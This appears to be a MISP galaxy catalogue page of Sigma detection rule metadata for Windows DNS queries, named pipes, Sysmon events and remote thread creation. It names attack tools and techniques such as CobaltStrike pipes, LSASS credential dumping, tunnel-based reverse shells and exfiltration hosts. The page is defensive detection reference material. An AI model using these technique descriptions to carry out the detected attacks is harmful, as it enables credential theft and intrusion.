tags ['attack.command-and-control', 'attack.t1105']
Related clusters

To see the related clusters, click here.

Suspicious DNS Query Indicating Kerberos Coercion via DNS Object SPN Spoofing

Detects DNS queries containing patterns associated with Kerberos coercion attacks via DNS object spoofing. The pattern "1UWhRCAAAAA..BAAAA" is a base64-encoded signature that corresponds to a marshaled CREDENTIAL_TARGET_INFORMATION structure. Attackers can use this technique to coerce authentication from victim systems to attacker-controlled hosts. It is one of the strong indicators of a Kerberos coercion attack, where adversaries manipulate DNS records to spoof Service Principal Names (SPNs) and redirect authentication requests like CVE-2025-33073.

Internal MISP references

UUID e7a21b5f-d8c4-4ae5-b8d9-93c5d3f28e1c which can be used as unique global reference for Suspicious DNS Query Indicating Kerberos Coercion via DNS Object SPN Spoofing in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Swachchhanda Shrawan Poudel (Nextron Systems)
creation_date 2025-06-20
falsepositive ['Unknown']
filename dns_query_win_kerberos_coercion_via_dns_object_spoofing.yml
level high
logsource.category dns_query
logsource.product windows
tags ['attack.collection', 'attack.credential-access', 'attack.persistence', 'attack.privilege-escalation', 'attack.t1557.001', 'attack.t1187']
Related clusters

To see the related clusters, click here.

DNS Query Request By QuickAssist.EXE

Detects DNS queries initiated by "QuickAssist.exe" to Microsoft Quick Assist primary endpoint that is used to establish a session.

Internal MISP references

UUID 882e858a-3233-4ba8-855e-2f3d3575803d which can be used as unique global reference for DNS Query Request By QuickAssist.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Muhammad Faisal (@faisalusuf)
creation_date 2024-12-19
falsepositive ['Legitimate use of Quick Assist in the environment.']
filename dns_query_win_quickassist.yml
level low
logsource.category dns_query
logsource.product windows
tags ['attack.command-and-control', 'attack.initial-access', 'attack.lateral-movement', 'attack.t1071.001', 'attack.t1210']
Related clusters

To see the related clusters, click here.

Suspicious DNS Query for IP Lookup Service APIs

Detects DNS queries for IP lookup services such as "api.ipify.org" originating from a non browser process.

Internal MISP references

UUID ec82e2a5-81ea-4211-a1f8-37a0286df2c2 which can be used as unique global reference for Suspicious DNS Query for IP Lookup Service APIs in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Brandon George (blog post), Thomas Patzke
creation_date 2021-07-08
falsepositive ['Legitimate usage of IP lookup services such as ipify API']
filename dns_query_win_susp_external_ip_lookup.yml
level medium
logsource.category dns_query
logsource.product windows
tags ['attack.reconnaissance', 'attack.t1590']
Related clusters

To see the related clusters, click here.

TeamViewer Domain Query By Non-TeamViewer Application

Detects DNS queries to a TeamViewer domain only resolved by a TeamViewer client by an image that isn't named TeamViewer (sometimes used by threat actors for obfuscation)

Internal MISP references

UUID 778ba9a8-45e4-4b80-8e3e-34a419f0b85e which can be used as unique global reference for TeamViewer Domain Query By Non-TeamViewer Application in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022-01-30
falsepositive ['Unknown binary names of TeamViewer', 'Depending on the environment the rule might require some initial tuning before usage to avoid FP with third party applications']
filename dns_query_win_teamviewer_domain_query_by_uncommon_app.yml
level medium
logsource.category dns_query
logsource.product windows
tags ['attack.command-and-control', 'attack.t1219.002']
Related clusters

To see the related clusters, click here.

DNS Server Discovery Via LDAP Query

Detects DNS server discovery via LDAP query requests from uncommon applications

Internal MISP references

UUID a21bcd7e-38ec-49ad-b69a-9ea17e69509e which can be used as unique global reference for DNS Server Discovery Via LDAP Query in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-08-20
falsepositive ['Likely']
filename dns_query_win_dns_server_discovery_via_ldap_query.yml
level low
logsource.category dns_query
logsource.product windows
tags ['attack.discovery', 'attack.t1482']
Related clusters

To see the related clusters, click here.

DNS Query To Devtunnels Domain

Detects DNS query requests to Devtunnels domains. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.

Internal MISP references

UUID 1cb0c6ce-3d00-44fc-ab9c-6d6d577bf20b which can be used as unique global reference for DNS Query To Devtunnels Domain in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author citron_ninja
creation_date 2023-10-25
falsepositive ['Legitimate use of Devtunnels will also trigger this.']
filename dns_query_win_devtunnels_communication.yml
level medium
logsource.category dns_query
logsource.product windows
tags ['attack.command-and-control', 'attack.t1071.001', 'attack.t1572']
Related clusters

To see the related clusters, click here.

DNS HybridConnectionManager Service Bus

Detects Azure Hybrid Connection Manager services querying the Azure service bus service

Internal MISP references

UUID 7bd3902d-8b8b-4dd4-838a-c6862d40150d which can be used as unique global reference for DNS HybridConnectionManager Service Bus in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2021-04-12
falsepositive ['Legitimate use of Azure Hybrid Connection Manager and the Azure Service Bus service']
filename dns_query_win_hybridconnectionmgr_servicebus.yml
level high
logsource.category dns_query
logsource.product windows
tags ['attack.persistence', 'attack.t1554']
Related clusters

To see the related clusters, click here.

DNS Query Tor .Onion Address - Sysmon

Detects DNS queries to an ".onion" address related to Tor routing networks

Internal MISP references

UUID b55ca2a3-7cff-4dda-8bdd-c7bfa63bf544 which can be used as unique global reference for DNS Query Tor .Onion Address - Sysmon in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-02-20
falsepositive ['Unknown']
filename dns_query_win_tor_onion_domain_query.yml
level high
logsource.category dns_query
logsource.product windows
tags ['attack.command-and-control', 'attack.t1090.003']
Related clusters

To see the related clusters, click here.

DNS Query To Ufile.io

Detects DNS queries to "ufile.io", which was seen abused by malware and threat actors as a method for data exfiltration

Internal MISP references

UUID 1cbbeaaf-3c8c-4e4c-9d72-49485b6a176b which can be used as unique global reference for DNS Query To Ufile.io in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author yatinwad, TheDFIRReport
creation_date 2022-06-23
falsepositive ['DNS queries for "ufile" are not malicious by nature necessarily. Investigate the source to determine the necessary actions to take']
filename dns_query_win_ufile_io_query.yml
level low
logsource.category dns_query
logsource.product windows
tags ['attack.exfiltration', 'attack.t1567.002']
Related clusters

To see the related clusters, click here.

DNS Query for Anonfiles.com Domain - Sysmon

Detects DNS queries for "anonfiles.com", which is an anonymous file upload platform often used for malicious purposes

Internal MISP references

UUID 065cceea-77ec-4030-9052-fc0affea7110 which can be used as unique global reference for DNS Query for Anonfiles.com Domain - Sysmon in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author pH-T (Nextron Systems)
creation_date 2022-07-15
falsepositive ['Rare legitimate access to anonfiles.com']
filename dns_query_win_anonymfiles_com.yml
level high
logsource.category dns_query
logsource.product windows
tags ['attack.exfiltration', 'attack.t1567.002']
Related clusters

To see the related clusters, click here.

DNS Query To MEGA Hosting Website

Detects DNS queries for subdomains related to MEGA sharing website

Internal MISP references

UUID 613c03ba-0779-4a53-8a1f-47f914a4ded3 which can be used as unique global reference for DNS Query To MEGA Hosting Website in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Aaron Greetham (@beardofbinary) - NCC Group
creation_date 2021-05-26
falsepositive ['Legitimate DNS queries and usage of Mega']
filename dns_query_win_mega_nz.yml
level medium
logsource.category dns_query
logsource.product windows
tags ['attack.exfiltration', 'attack.t1567.002']
Related clusters

To see the related clusters, click here.

DNS Query To Visual Studio Code Tunnels Domain

Detects DNS query requests to Visual Studio Code tunnel domains. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.

Internal MISP references

UUID b3e6418f-7c7a-4fad-993a-93b65027a9f1 which can be used as unique global reference for DNS Query To Visual Studio Code Tunnels Domain in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author citron_ninja
creation_date 2023-10-25
falsepositive ['Legitimate use of Visual Studio Code tunnel will also trigger this.']
filename dns_query_win_vscode_tunnel_communication.yml
level medium
logsource.category dns_query
logsource.product windows
tags ['attack.command-and-control', 'attack.t1071.001']
Related clusters

To see the related clusters, click here.

DNS Query Request To OneLaunch Update Service

Detects DNS query requests to "update.onelaunch.com". This domain is associated with the OneLaunch adware application. When the OneLaunch application is installed it will attempt to get updates from this domain.

Internal MISP references

UUID df68f791-ad95-447f-a271-640a0dab9cf8 which can be used as unique global reference for DNS Query Request To OneLaunch Update Service in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Josh Nickels
creation_date 2024-02-26
falsepositive ['Unlikely']
filename dns_query_win_onelaunch_update_service.yml
level low
logsource.category dns_query
logsource.product windows
tags ['attack.credential-access', 'attack.collection', 'attack.t1056']
Related clusters

To see the related clusters, click here.

DNS Query Request By Regsvr32.EXE

Detects DNS queries initiated by "Regsvr32.exe"

Internal MISP references

UUID 36e037c4-c228-4866-b6a3-48eb292b9955 which can be used as unique global reference for DNS Query Request By Regsvr32.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Dmitriy Lifanov, oscd.community
creation_date 2019-10-25
falsepositive ['Unknown']
filename dns_query_win_regsvr32_dns_query.yml
level medium
logsource.category dns_query
logsource.product windows
tags ['attack.execution', 'attack.t1559.001', 'attack.defense-evasion', 'attack.t1218.010']
Related clusters

To see the related clusters, click here.

DNS Query To Remote Access Software Domain From Non-Browser App

An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)

Internal MISP references

UUID 4d07b1f4-cb00-4470-b9f8-b0191d48ff52 which can be used as unique global reference for DNS Query To Remote Access Software Domain From Non-Browser App in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Connor Martin
creation_date 2022-07-11
falsepositive ['Likely with other browser software. Apply additional filters for any other browsers you might use.']
filename dns_query_win_remote_access_software_domains_non_browsers.yml
level medium
logsource.category dns_query
logsource.product windows
tags ['attack.command-and-control', 'attack.t1219.002']
Related clusters

To see the related clusters, click here.

Malicious Named Pipe Created

Detects the creation of a named pipe seen used by known APTs or malware.

Internal MISP references

UUID fe3ac066-98bb-432a-b1e7-a5229cb39d4a which can be used as unique global reference for Malicious Named Pipe Created in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), blueteam0ps, elhoim
creation_date 2017-11-06
falsepositive ['Unknown']
filename pipe_created_susp_malicious_namedpipes.yml
level critical
logsource.category pipe_created
logsource.product windows
tags ['attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1055']
Related clusters

To see the related clusters, click here.

CobaltStrike Named Pipe Patterns

Detects the creation of a named pipe with a pattern found in CobaltStrike malleable C2 profiles

Internal MISP references

UUID 85adeb13-4fc9-4e68-8a4a-c7cb2c336eb7 which can be used as unique global reference for CobaltStrike Named Pipe Patterns in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)
creation_date 2021-07-30
falsepositive ['Chrome instances using the exact same pipe name "mojo.xxx"', 'Websense Endpoint using the pipe name "DserNamePipe(R
filename pipe_created_hktl_cobaltstrike_susp_pipe_patterns.yml
level high
logsource.category pipe_created
logsource.product windows
tags ['attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1055', 'stp.1k']
Related clusters

To see the related clusters, click here.

PUA - RemCom Default Named Pipe

Detects default RemCom pipe creation

Internal MISP references

UUID d36f87ea-c403-44d2-aa79-1a0ac7c24456 which can be used as unique global reference for PUA - RemCom Default Named Pipe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nikita Nazarov, oscd.community, Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-08-07
falsepositive ['Legitimate Administrator activity']
filename pipe_created_pua_remcom_default_pipe.yml
level medium
logsource.category pipe_created
logsource.product windows
tags ['attack.lateral-movement', 'attack.t1021.002', 'attack.execution', 'attack.t1569.002']
Related clusters

To see the related clusters, click here.

ADFS Database Named Pipe Connection By Uncommon Tool

Detects suspicious local connections via a named pipe to the AD FS configuration database (Windows Internal Database). Used to access information such as the AD FS configuration settings which contains sensitive information used to sign SAML tokens.

Internal MISP references

UUID 1ea13e8c-03ea-409b-877d-ce5c3d2c1cb3 which can be used as unique global reference for ADFS Database Named Pipe Connection By Uncommon Tool in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez @Cyb3rWard0g
creation_date 2021-10-08
falsepositive ['Unknown']
filename pipe_created_adfs_namedpipe_connection_uncommon_tool.yml
level medium
logsource.category pipe_created
logsource.product windows
tags ['attack.collection', 'attack.t1005']
Related clusters

To see the related clusters, click here.

CobaltStrike Named Pipe Pattern Regex

Detects the creation of a named pipe matching a pattern used by CobaltStrike Malleable C2 profiles

Internal MISP references

UUID 0e7163d4-9e19-4fa7-9be6-000c61aad77a which can be used as unique global reference for CobaltStrike Named Pipe Pattern Regex in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021-07-30
falsepositive ['Unknown']
filename pipe_created_hktl_cobaltstrike_re.yml
level critical
logsource.category pipe_created
logsource.product windows
tags ['attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1055']
Related clusters

To see the related clusters, click here.

PUA - PAExec Default Named Pipe

Detects PAExec default named pipe

Internal MISP references

UUID f6451de4-df0a-41fa-8d72-b39f54a08db5 which can be used as unique global reference for PUA - PAExec Default Named Pipe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-10-26
falsepositive ['Unknown']
filename pipe_created_pua_paexec_default_pipe.yml
level medium
logsource.category pipe_created
logsource.product windows
tags ['attack.execution', 'attack.t1569.002']
Related clusters

To see the related clusters, click here.

PUA - CSExec Default Named Pipe

Detects default CSExec pipe creation

Internal MISP references

UUID f318b911-ea88-43f4-9281-0de23ede628e which can be used as unique global reference for PUA - CSExec Default Named Pipe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nikita Nazarov, oscd.community, Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-08-07
falsepositive ['Legitimate Administrator activity']
filename pipe_created_pua_csexec_default_pipe.yml
level medium
logsource.category pipe_created
logsource.product windows
tags ['attack.lateral-movement', 'attack.t1021.002', 'attack.execution', 'attack.t1569.002']
Related clusters

To see the related clusters, click here.

HackTool - CoercedPotato Named Pipe Creation

Detects the pattern of a pipe name as used by the hack tool CoercedPotato

Internal MISP references

UUID 4d0083b3-580b-40da-9bba-626c19fe4033 which can be used as unique global reference for HackTool - CoercedPotato Named Pipe Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2023-10-11
falsepositive ['Unknown']
filename pipe_created_hktl_coercedpotato.yml
level high
logsource.category pipe_created
logsource.product windows
tags ['attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1055']
Related clusters

To see the related clusters, click here.

HackTool - EfsPotato Named Pipe Creation

Detects the pattern of a pipe name as used by the hack tool EfsPotato

Internal MISP references

UUID 637f689e-b4a5-4a86-be0e-0100a0a33ba2 which can be used as unique global reference for HackTool - EfsPotato Named Pipe Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021-08-23
falsepositive ['\pipe\LOCAL\Monitorian']
filename pipe_created_hktl_efspotato.yml
level high
logsource.category pipe_created
logsource.product windows
tags ['attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1055']
Related clusters

To see the related clusters, click here.

HackTool - DiagTrackEoP Default Named Pipe

Detects creation of default named pipe used by the DiagTrackEoP POC, a tool that abuses "SeImpersonate" privilege.

Internal MISP references

UUID 1f7025a6-e747-4130-aac4-961eb47015f1 which can be used as unique global reference for HackTool - DiagTrackEoP Default Named Pipe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-08-03
falsepositive ['Unlikely']
filename pipe_created_hktl_diagtrack_eop.yml
level critical
logsource.category pipe_created
logsource.product windows
tags ['attack.privilege-escalation']

HackTool - Koh Default Named Pipe

Detects creation of default named pipes used by the Koh tool

Internal MISP references

UUID 0adc67e0-a68f-4ffd-9c43-28905aad5d6a which can be used as unique global reference for HackTool - Koh Default Named Pipe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-07-08
falsepositive ['Unlikely']
filename pipe_created_hktl_koh_default_pipe.yml
level critical
logsource.category pipe_created
logsource.product windows
tags ['attack.defense-evasion', 'attack.privilege-escalation', 'attack.credential-access', 'attack.t1528', 'attack.t1134.001']
Related clusters

To see the related clusters, click here.

CobaltStrike Named Pipe

Detects the creation of a named pipe as used by CobaltStrike

Internal MISP references

UUID d5601f8c-b26f-4ab0-9035-69e11a8d4ad2 which can be used as unique global reference for CobaltStrike Named Pipe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Wojciech Lesicki
creation_date 2021-05-25
falsepositive ['Unknown']
filename pipe_created_hktl_cobaltstrike.yml
level critical
logsource.category pipe_created
logsource.product windows
tags ['attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1055']
Related clusters

To see the related clusters, click here.

Alternate PowerShell Hosts Pipe

Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe

Internal MISP references

UUID 58cb02d5-78ce-4692-b3e1-dce850aae41a which can be used as unique global reference for Alternate PowerShell Hosts Pipe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez @Cyb3rWard0g, Tim Shelton
creation_date 2019-09-12
falsepositive ['Programs using PowerShell directly without invocation of a dedicated interpreter.']
filename pipe_created_powershell_alternate_host_pipe.yml
level medium
logsource.category pipe_created
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

PsExec Tool Execution From Suspicious Locations - PipeName

Detects PsExec default pipe creation where the image executed is located in a suspicious location. Which could indicate that the tool is being used in an attack

Internal MISP references

UUID 41504465-5e3a-4a5b-a5b4-2a0baadd4463 which can be used as unique global reference for PsExec Tool Execution From Suspicious Locations - PipeName in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-08-04
falsepositive ['Rare legitimate use of psexec from the locations mentioned above. This will require initial tuning based on your environment.']
filename pipe_created_sysinternals_psexec_default_pipe_susp_location.yml
level medium
logsource.category pipe_created
logsource.product windows
tags ['attack.execution', 'attack.t1569.002', 'attack.s0029']
Related clusters

To see the related clusters, click here.

WMI Event Consumer Created Named Pipe

Detects the WMI Event Consumer service scrcons.exe creating a named pipe

Internal MISP references

UUID 493fb4ab-cdcc-4c4f-818c-0e363bd1e4bb which can be used as unique global reference for WMI Event Consumer Created Named Pipe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021-09-01
falsepositive ['Unknown']
filename pipe_created_scrcons_wmi_consumer_namedpipe.yml
level medium
logsource.category pipe_created
logsource.product windows
tags ['attack.t1047', 'attack.execution']
Related clusters

To see the related clusters, click here.

HackTool - Credential Dumping Tools Named Pipe Created

Detects well-known credential dumping tools execution via specific named pipe creation

Internal MISP references

UUID 961d0ba2-3eea-4303-a930-2cf78bbfcc5e which can be used as unique global reference for HackTool - Credential Dumping Tools Named Pipe Created in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Teymur Kheirkhabarov, oscd.community
creation_date 2019-11-01
falsepositive ['Legitimate Administrator using tool for password recovery']
filename pipe_created_hktl_generic_cred_dump_tools_pipes.yml
level critical
logsource.category pipe_created
logsource.product windows
tags ['attack.credential-access', 'attack.t1003.001', 'attack.t1003.002', 'attack.t1003.004', 'attack.t1003.005']
Related clusters

To see the related clusters, click here.

New PowerShell Instance Created

Detects the execution of PowerShell via the creation of a named pipe starting with PSHost

Internal MISP references

UUID ac7102b4-9e1e-4802-9b4f-17c5524c015c which can be used as unique global reference for New PowerShell Instance Created in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2019-09-12
falsepositive ['Likely']
filename pipe_created_powershell_execution_pipe.yml
level informational
logsource.category pipe_created
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Sysmon Configuration Modification

Detects when an attacker tries to hide from Sysmon by disabling or stopping it

Internal MISP references

UUID 1f2b5353-573f-4880-8e33-7d04dcf97744 which can be used as unique global reference for Sysmon Configuration Modification in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021-06-04
falsepositive ['Legitimate administrative action']
filename sysmon_config_modification_status.yml
level high
logsource.category sysmon_status
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1564']
Related clusters

To see the related clusters, click here.

Sysmon Configuration Change

Detects a Sysmon configuration change, which could be the result of a legitimate reconfiguration or someone trying manipulate the configuration

Internal MISP references

UUID 8ac03a65-6c84-4116-acad-dc1558ff7a77 which can be used as unique global reference for Sysmon Configuration Change in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-01-12
falsepositive ['Legitimate administrative action']
filename sysmon_config_modification.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.defense-evasion']

Sysmon Blocked File Shredding

Triggers on any Sysmon "FileBlockShredding" event, which indicates a violation of the configured shredding policy.

Internal MISP references

UUID c3e5c1b1-45e9-4632-b242-27939c170239 which can be used as unique global reference for Sysmon Blocked File Shredding in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2023-07-20
falsepositive ['Unlikely']
filename sysmon_file_block_shredding.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense-evasion']

Sysmon Configuration Error

Detects when an adversary is trying to hide it's action from Sysmon logging based on error messages

Internal MISP references

UUID 815cd91b-7dbc-4247-841a-d7dd1392b0a8 which can be used as unique global reference for Sysmon Configuration Error in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021-06-04
falsepositive ['Legitimate administrative action']
filename sysmon_config_modification_error.yml
level high
logsource.category sysmon_error
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1564']
Related clusters

To see the related clusters, click here.

Sysmon File Executable Creation Detected

Triggers on any Sysmon "FileExecutableDetected" event, which triggers every time a PE that is monitored by the config is created.

Internal MISP references

UUID 693a44e9-7f26-4cb6-b787-214867672d3a which can be used as unique global reference for Sysmon File Executable Creation Detected in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2023-07-20
falsepositive ['Unlikely']
filename sysmon_file_executable_detected.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.defense-evasion']

Sysmon Blocked Executable

Triggers on any Sysmon "FileBlockExecutable" event, which indicates a violation of the configured block policy

Internal MISP references

UUID 23b71bc5-953e-4971-be4c-c896cda73fc2 which can be used as unique global reference for Sysmon Blocked Executable in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-08-16
falsepositive ['Unlikely']
filename sysmon_file_block_executable.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense-evasion']

Remote Thread Creation By Uncommon Source Image

Detects uncommon processes creating remote threads.

Internal MISP references

UUID 66d31e5f-52d6-40a4-9615-002d3789a119 which can be used as unique global reference for Remote Thread Creation By Uncommon Source Image in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Perez Diego (@darkquassar), oscd.community
creation_date 2019-10-27
falsepositive ['This rule is best put in testing first in order to create a baseline that reflects the data in your environment.']
filename create_remote_thread_win_susp_uncommon_source_image.yml
level medium
logsource.category create_remote_thread
logsource.product windows
tags ['attack.privilege-escalation', 'attack.defense-evasion', 'attack.t1055']
Related clusters

To see the related clusters, click here.

Remote Thread Created In KeePass.EXE

Detects remote thread creation in "KeePass.exe" which could indicates potential password dumping activity

Internal MISP references

UUID 77564cc2-7382-438b-a7f6-395c2ae53b9a which can be used as unique global reference for Remote Thread Created In KeePass.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Timon Hackenjos
creation_date 2022-04-22
falsepositive ['Unknown']
filename create_remote_thread_win_keepass.yml
level high
logsource.category create_remote_thread
logsource.product windows
tags ['attack.credential-access', 'attack.t1555.005']
Related clusters

To see the related clusters, click here.

Remote Thread Creation Via PowerShell In Uncommon Target

Detects the creation of a remote thread from a Powershell process in an uncommon target process

Internal MISP references

UUID 99b97608-3e21-4bfe-8217-2a127c396a0e which can be used as unique global reference for Remote Thread Creation Via PowerShell In Uncommon Target in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2018-06-25
falsepositive ['Unknown']
filename create_remote_thread_win_powershell_susp_targets.yml
level medium
logsource.category create_remote_thread
logsource.product windows
tags ['attack.defense-evasion', 'attack.execution', 'attack.t1218.011', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

HackTool - CACTUSTORCH Remote Thread Creation

Detects remote thread creation from CACTUSTORCH as described in references.

Internal MISP references

UUID 2e4e488a-6164-4811-9ea1-f960c7359c40 which can be used as unique global reference for HackTool - CACTUSTORCH Remote Thread Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @SBousseaden (detection), Thomas Patzke (rule)
creation_date 2019-02-01
falsepositive ['Unknown']
filename create_remote_thread_win_hktl_cactustorch.yml
level high
logsource.category create_remote_thread
logsource.product windows
tags ['attack.privilege-escalation', 'attack.defense-evasion', 'attack.execution', 'attack.t1055.012', 'attack.t1059.005', 'attack.t1059.007', 'attack.t1218.005']
Related clusters

To see the related clusters, click here.

HackTool - Potential CobaltStrike Process Injection

Detects a potential remote threat creation with certain characteristics which are typical for Cobalt Strike beacons

Internal MISP references

UUID 6309645e-122d-4c5b-bb2b-22e4f9c2fa42 which can be used as unique global reference for HackTool - Potential CobaltStrike Process Injection in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Olaf Hartong, Florian Roth (Nextron Systems), Aleksey Potapov, oscd.community
creation_date 2018-11-30
falsepositive ['Unknown']
filename create_remote_thread_win_hktl_cobaltstrike.yml
level high
logsource.category create_remote_thread
logsource.product windows
tags ['attack.privilege-escalation', 'attack.defense-evasion', 'attack.t1055.001']
Related clusters

To see the related clusters, click here.

Password Dumper Remote Thread in LSASS

Detects password dumper activity by monitoring remote thread creation EventID 8 in combination with the lsass.exe process as TargetImage. The process in field Process is the malicious program. A single execution can lead to hundreds of events.

Internal MISP references

UUID f239b326-2f41-4d6b-9dfa-c846a60ef505 which can be used as unique global reference for Password Dumper Remote Thread in LSASS in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Thomas Patzke
creation_date 2017-02-19
falsepositive ['Antivirus products']
filename create_remote_thread_win_susp_password_dumper_lsass.yml
level high
logsource.category create_remote_thread
logsource.product windows
tags ['attack.credential-access', 'attack.s0005', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

Remote Thread Creation In Mstsc.Exe From Suspicious Location

Detects remote thread creation in the "mstsc.exe" process by a process located in a potentially suspicious location. This technique is often used by attackers in order to hook some APIs used by DLLs loaded by "mstsc.exe" during RDP authentications in order to steal credentials.

Internal MISP references

UUID c0aac16a-b1e7-4330-bab0-3c27bb4987c7 which can be used as unique global reference for Remote Thread Creation In Mstsc.Exe From Suspicious Location in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-07-28
falsepositive ['Unknown']
filename create_remote_thread_win_mstsc_susp_location.yml
level high
logsource.category create_remote_thread
logsource.product windows
tags ['attack.credential-access']

Remote Thread Creation Ttdinject.exe Proxy

Detects a remote thread creation of Ttdinject.exe used as proxy

Internal MISP references

UUID c15e99a3-c474-48ab-b9a7-84549a7a9d16 which can be used as unique global reference for Remote Thread Creation Ttdinject.exe Proxy in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-05-16
falsepositive ['Unknown']
filename create_remote_thread_win_ttdinjec.yml
level high
logsource.category create_remote_thread
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1127']
Related clusters

To see the related clusters, click here.

Potential Credential Dumping Attempt Via PowerShell Remote Thread

Detects remote thread creation by PowerShell processes into "lsass.exe"

Internal MISP references

UUID fb656378-f909-47c1-8747-278bf09f4f4f which can be used as unique global reference for Potential Credential Dumping Attempt Via PowerShell Remote Thread in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author oscd.community, Natalia Shornikova
creation_date 2020-10-06
falsepositive ['Unknown']
filename create_remote_thread_win_powershell_lsass.yml
level high
logsource.category create_remote_thread
logsource.product windows
tags ['attack.credential-access', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

Remote Thread Creation In Uncommon Target Image

Detects uncommon target processes for remote thread creation

Internal MISP references

UUID a1a144b7-5c9b-4853-a559-2172be8d4a03 which can be used as unique global reference for Remote Thread Creation In Uncommon Target Image in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
